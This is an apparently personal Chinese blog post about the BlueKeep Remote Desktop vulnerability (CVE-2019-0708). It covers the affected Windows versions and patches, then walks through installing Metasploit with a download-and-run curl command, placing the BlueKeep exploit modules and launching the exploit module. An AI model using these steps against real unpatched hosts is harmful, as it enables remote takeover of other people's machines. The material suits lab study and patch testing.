- A+
cve 0708远程桌面漏洞
这一次 CVE-2019-0708 是一个系统级的任意命令执行,这意味着如果服务器安装的是在漏洞影响范围内的 Windows 系统,且没有打上微软的补丁,只要你能够通过远程桌面连接到它,那么你就可以使用 CVE-2019-0708 攻击它。
这一漏洞的危险程度不亚于曾经被 WannaCry 利用的“永恒之蓝”,在 Twitter 上有网友表示如果这一漏洞的利用代码泄出,可能会有人利用这一漏洞开发 WannaCry 的变种,这会对全球的计算机带来极大的威胁。
CVE-2019-0708 主要影响的 Windows 有 Windows 7、Windows Server 2008、Windows Server 2008 R2,这些系统可以通过累积更新补丁或单独的安全补丁来修复这一漏洞。
微软已经停止支持的 Windows 2003、Windows XP 也会受到影响,微软针对这一漏洞为这两个已经停止支持的系统提供了单独的修复补丁,补丁编号为 KB4500705。
漏洞环境
攻击机
准备工具
1.安装/升级metasploit-framework
1 |
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall |
2.下载Reference中的攻击套件放置文件到msf的相应文件夹(如果已存在同名文件,直接覆盖即可)
1 2 3 4 |
rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb |
3.加载模块
命令:reload_all
4.检查一下
攻击命令
1.使用msfconsole进入metasploit-framework
2.进入以后使用reload_all重新加载0708rdp利用模块
3.使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce启用0708RDP攻击模块
4.使用info查看工具相关信息以及设置
5.机器架构
攻击结果
提取码:m3ne
- 我的微信
- 这是我的微信扫一扫
- 我的微信公众号
- 我的微信公众号扫一扫